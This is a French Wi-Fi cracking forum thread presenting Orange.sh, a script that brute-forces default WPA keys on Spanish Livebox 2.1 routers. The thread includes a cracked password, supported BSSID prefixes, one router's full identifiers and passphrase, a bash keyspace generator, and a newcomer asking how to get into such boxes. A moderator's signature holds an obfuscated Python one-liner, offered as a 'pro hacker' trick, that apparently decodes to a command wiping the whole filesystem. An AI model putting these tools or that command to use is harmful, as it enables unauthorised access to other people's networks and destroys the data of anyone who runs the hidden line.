Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 24-02-2013 01:24:40

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Orange.sh : génerateur WPA livebox 2.1 espagnole

ORANGE.SH

----------------------------------------------------- - By: 1camaron1
 o  o          o                     o-o
  |  |          | /  o               o   o
  O--O  oo  o-o OO     o-o  o--o     |   | o-o  oo o-o  o--o o-o
  |  | | | |    | \  | |  | |  |     o   o |   | | |  | |  | |-
  o  o o-o- o-o o  o | o  o o--O      o-o  o   o-o-o  o o--O o-o
                               |                           |
                            o--o                        o--o
-----------------------------------------------------------------------


  Suite au travail impulsé para 1camaron1 de lampiweb.com ( Script diccionario para Orange-xxxx; je vous présente son travail auquel j'ai collaboré, un petit script permettant de profiter d'une énorme faille de sécurité sur les  livebox 2.1 d'Espagne (celles qui sont installées en ce moment)
L'étude de l'algorithme ne donnant rien de concret nous sommes partis sur différentes pistes pour écourter les dictionnaires et au fur et à mesure que des données sont entrées 1camaron1 c'est rendu compte que certains caractères hexadécimaux majuscules... n'apparaissaient pas. 56k
  Je viens juste de craquer un handshake que m'a envoyé un utilisateur pour faire des tests, et nous devons être à une vingtaine de red des-encryptées grâce à cette méthode tongue cool

Voici le jeux de catractères : 2 3 4 5 6 7 9 A C E F

Concrètement ça m'a pris environ 45 heures

Tried 91444572 PMKs so far; 0 PMKs per second.d.

The password is 'ACC76292'.

Vous noterez le joli bug de pyrit (car ce furent plutôt 600 PMK/secondes ) du à une installation douloureuse et cahotqiue avec  xubuntu 12.10 64 bits.
Ma carte c'est du caca, 25€
Mais bon. la démonstration n'en est que plus probante.

  Car en effet un brute force sur 11 caractères possibles ( 214358881 keys) dans un chaîne de 8 digits, ce n'est pas la même chose qu'un brute force avec un jeu de 16 caractères (4294967296 ), On pourrait Même ironiquement apprécier cette ouverture démocratique du brute force même vers les plus démunis en hardware (personellement moins depuis quelques jours... merci papa wifi wink.... mais niveau GPU c'est pas ça).
Grosso modo a 1000 keys/secondes on est en moins de 60 heures
17 heures avec un i5
23 minutes avec une Radeon HD 6990 tongue



LA VICTIME


Wr2H.png

http://i.imm.io/Wr2H.png

            LIVEBOX  2,1
Essid                           Orange-XXXX
Fabricant:                     Arcadyan technologie
Marque commerciale:    ASTORIA Network       
Version du firmware:     00.95.005 (09.03.2012-18:10:13) y V00.94.000
Version du boot:            v0.70.01
Version du Módem         ADSL: 5.4.1.10.1.1A
Version du Hardware:     01
Numéro de série:           JXXXXXXXXX  où les X sont des numéros)
Dates de fabriactions:     08 y 09 de 2012


BSSIDS SUPPORTéS > 1C:C6:3C
                                  50:7E:5D 
                                  74:31:70


LE TOOL




XcrM.png


Vous avez donc un fichier appelé Orange.zip que vous "dézippez" en vous situant dans le dossier ou vous avez votre télçéchargement (click droit + ouvrir terminal ici ou bien cd + route archive)

unzip Orange.sh

Vous copiez votre handshake dans le dossier décomprimé et pouvez lancer le script

bash Orange.sh

Vous verrez un menu simple vous permettant de générer le dictionnaire ou de le passer en direct avec aircrack-ng ou pyrit,
Nous avons aussi inclut wg-pl ( Matteo Matteo Redaelli - GNU public license v3, grazie bello! wink ) pour mener une attaque expérimentale que nous enlèverons dans le futur ou changerons car il s'avère que l'expérience à échoué ( nous dépurions avec wg-pl en limitant différents types de répétitions ce qui enlevait 50% du dictionnaire, mais c'était trop tongue )
Vous pourrez aussi indiquer le premier caractère a essayer, afin de pouvoir procéder par étapes...
Qui sait, peut être bientôt en France, des livebox aracdyan tongue

CHANGELOG
Mercredi 20 février 2010
Version 1.1
- Modification du menue d'entrée: 4 options:  1- Générateur  2- Live Crack  3- Début clef  4- Sortir:
- Détection handshake, résultat en sortie il n'est plus nécessaire d'introduire le nom du fichier .cap
- Simplification script
- filtre bssid
- Inclut une copie de wg.pl de Matteo Redaelli (free software) pour réduction supplémentaire
- Inclut attaques Pyrit (Free software)




+---------------------------------------------------+
|            TELECHARGEMENTS                     |
+----------------------------------------------------+




Copyright 2013, Lampiweb.com

Author: 1camaron1 with the collaboration of kcdtv





---------------------------------------------------------------------------------------------------------------------------------------------------------------------
license
This package is free software; you can redistribute it and/or modify it under the terms or the "GNU General Public License".
disclaimer
This package is distributed in the hope that it will be useful, but without any waranty; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the "GNU General Public License" for more details.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 24-02-2013 02:14:10

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : Orange.sh : génerateur WPA livebox 2.1 espagnole

Ca pour une nouvelle!! C'est une bonne nouvelle wink



Bravo et encore merci wink








Autre Chose? je peux ? ......> je l'aurrai un jour, je l'aurrai wink lol


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#3 24-02-2013 03:11:27

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Orange.sh : génerateur WPA livebox 2.1 espagnole

Encore une fois du beau travail ! bravo smile

Je suis un peu perdu quant à ce zoo des routeurs: France, Espagne, Belgique, Algérie...etc

Hors Ligne

#4 24-02-2013 03:29:48

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Orange.sh : génerateur WPA livebox 2.1 espagnole

Ça boxe dans tous les coins du globe avec du WPS et des trucs comme ça de temps en temps tongue .
D'ailleurs, le temps de préparer quelque chose, je vais vous parler ces jour-ci, entre autre, d'un autre gros raté du genre par un fabricant bien distribué mondialement sur un de ses routeurs N 300 mbps. cool
La démocratisation du brute-force est en route, rien ne l'arrêtera, même plus besoin de s'acheter une carte vidéo, un Pentium3 suffit. tongue

Hors Ligne

#5 24-02-2013 15:24:32

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Orange.sh : génerateur WPA livebox 2.1 espagnole

Hééé, chui même dans le code, la classe ! cool

Pas le temps de se reposer du côté de l'Espagne, on dirait ! Bon, faut dire qu'avec toutes ces failles, les FAI vous donnent beaucoup de boulot lol Je vais finir par croire qu'ils le font exprès...

Content de voir que tu progresses en Bash, j'ai quelques remarques techniques mais je t'enverrai ça en privé wink

Par contre je bénirai le jour où tu apprendras à indenter ton code ! big_smile

[EDIT]

kcdtv a écrit :

je vais vous parler ces jour-ci, entre autre, d'un autre gros raté du genre par un fabricant bien distribué mondialement sur un de ses routeurs N 300 mbps. cool

Je vote pour Netgear, j'ai bon ? smile

Dernière modification par antares145 (24-02-2013 16:14:21)

Hors Ligne

#6 24-02-2013 16:34:49

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Orange.sh : génerateur WPA livebox 2.1 espagnole

Il te reste encore de la place pour rajouter des croix à ton tableau de chasse? Impressionnant! big_smile

Hors Ligne

#7 24-02-2013 18:53:37

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Orange.sh : génerateur WPA livebox 2.1 espagnole

antares_145 a écrit :

Hééé, chui même dans le code, la classe !

et j'ai oublié de te mentionner dans le premier post---- on oublie toujours quelquechose. tongue
Tu y es même bien plus que tu crois vu que c'est en suivant tes conseils par rapport a la fonctionalisation et l'usage des fonctions récursives pour le retour sur menu ce qui ma guidé dans la mod du code.

Pas le temps de se reposer du côté de l'Espagne, on dirait ! Bon, faut dire qu'avec toutes ces failles, les FAI vous donnent beaucoup de boulot  Je vais finir par croire qu'ils le font exprès...

  Je t'avoue que nous en voyons des vertes et des pas mûres.
Le pompom pour une compagnie de galicie BR-Wlan qui distribuait une box ou le pass wpa par défaut c'était.... la mac sans les points.

shock.gif

antares a écrit :

Content de voir que tu progresses en Bash, j'ai quelques remarques techniques mais je t'enverrai ça en privé 

Par contre je bénirai le jour où tu apprendras à indenter ton code !

Je progresse tout doucement, il faut dire que je suis bien aidé... Pour ce qui est d'"indenter" le code il va falloir que je regarde ça. smile
Je n'ai pas encore ouvert mes mails mais je me délecte d'avance.
smile

Je vote pour Netgear, j'ai bon ?

Pas loin. pas loin du tout... mais je n'en dirais pas plus, tu avais droit à un seul guess tongue

Il te reste encore de la place pour rajouter des croix à ton tableau de chasse? Impressionnant!

C'est qu'il faut dire qu'ils nous les servent sur un plateau d'argent...
Avec 10-12 clefs en main sa saute aux yeux de n'importe qui.
Au début on pensait que c'était encore plus chaud que ça car nous avions deux clefs pour des modèles qui étaient à 2-3 milles unités d'intervalle en comparant les serials et les deux pass commençaient par 56....
Au début on pensait que l'on allait avoir une relation linéaire bssid > calcul serial > calcul clef
On peut bien remonter au serial, mais d'autres données sont rentrées et la relation n'est pas du tout linéaire entre serial et clef. Utilisent-ils une partie d'une chaîne plus grande pour que la relation soit moins directe?
Utilisent-ils une conversion en base d'une table de valeur statique ou fluctuante?.
L'usage de 11 caractères est une piste à creuser... pourquoi on t'il fait ça? Je crois que si on répond au pourquoi on peut trouver l'algorithme de la clef WPA.
Je vous mets les données complètes de la mienne pour si vous voulez jouer.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+  eSSID:                                          Orange-7307   ( "O" majuscule )
+  bSSID:                                          1C:C6:3C:90:73:07   
+  Serial Number                               J223155543
+  WPA passphrase                            EAA6A922  
+  Model name of manufacturer           ARV7519RW22-A-LT                                           
+  HW version                                    R01                                                                               
+  FW vwrsion                                    V00.95.005                                                                 
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

et je demanderai à 1camaron1 si il veut bien mettre la sienne aussi.

Hors Ligne

#8 25-02-2013 11:50:37

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Orange.sh : génerateur WPA livebox 2.1 espagnole

Sympathique !

Encore une fois j'ai envie de recommencer ze tool qui :
- scanne les AP à portée
- propose les pass par défaut et propose de les tester
- propose de bruteforcer les autres avec l'affichage du temps par rapport à un benchmark
passons,

L'octuple boucle for n'étant pas très belle, voici une belle fonction récursive :


#!/bin/bash

recursive_generator()
{
    if (($1 == 0)) 
    then 
         echo $2 >> $filename
    else 
        for car in 2 3 4 5 6 7 9 A C E F;                                      
        do 
            recursive_generator $(($1 - 1)) $2$car                             
        done                                                                   
    fi                                                                         
}

filename=dico.txt                                                              
longueur=3                                                                     

recursive_generator $longueur  

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#9 25-02-2013 18:52:21

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Orange.sh : génerateur WPA livebox 2.1 espagnole

Merci spawn pour cette jolie fonction récursive,
Je suis en train de l'essayer et j'ai l'impression que c'est un joli gain en efficacité smile

Encore une fois j'ai envie de recommencer ze tool qui :
 - scanne les AP à portée
 - propose les pass par défaut et propose de les tester
 - propose de bruteforcer les autres avec l'affichage du temps par rapport à un benchmark
passons,

Belle idée smile
Tu as déjà la fonction récursive pour générer des dicos hex tongue

Hors Ligne

#10 03-04-2014 20:46:56

masterleo
N00b
Inscription : 03-04-2014
Messages : 2

Re : Orange.sh : génerateur WPA livebox 2.1 espagnole

Bonjour je n'ai pas vraiment compris...
votre logiciel permet t'il de pénétrer les Livebox 2 ?
Si non : comment pénétrer une livebox 2? après-de maintes de recherche j'ai pas trouvé :,(
merci d'avance smile

Dernière modification par masterleo (03-04-2014 20:47:44)

Hors Ligne

#11 04-04-2014 12:30:55

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Orange.sh : génerateur WPA livebox 2.1 espagnole

Je crois que le tire parle de lui même et que les explications sont très claires.
Tu as une liste de bssid supportés, les détails sur le modèle, ça tient en cinq lignes... relis le premier post avec un  plus d'attention. wink

Hors Ligne

#12 21-11-2016 18:37:06

momomakK
Membre Actif
Inscription : 14-01-2014
Messages : 27

Re : Orange.sh : génerateur WPA livebox 2.1 espagnole

Petit up, c'est très intérressent les box de chez VOO belge pourrait-être vulnérable je ferais quelque test.:D
Le lien de dl me redirige vers ubuntu one ?

Dernière modification par momomakK (21-11-2016 18:47:12)

Hors Ligne

#13 22-11-2016 15:12:09

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Orange.sh : génerateur WPA livebox 2.1 espagnole

Les links sont tous "down"... je vais voir si je n'ai pas ça sur un hard drive pour l'uploader "again"
Vive le frenglish big_smile

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
35 1765 23-11-2016 16:31:33 par roofnat
1 216 21-11-2016 15:38:39 par koala
0 355 20-11-2016 09:18:26 par regard48
Épinglée :
185 185469 10-07-2016 19:35:20 par Seska
livebox et clé psk par s1lv3rf0x
4 534 29-06-2016 23:26:36 par Fab955

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.029 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]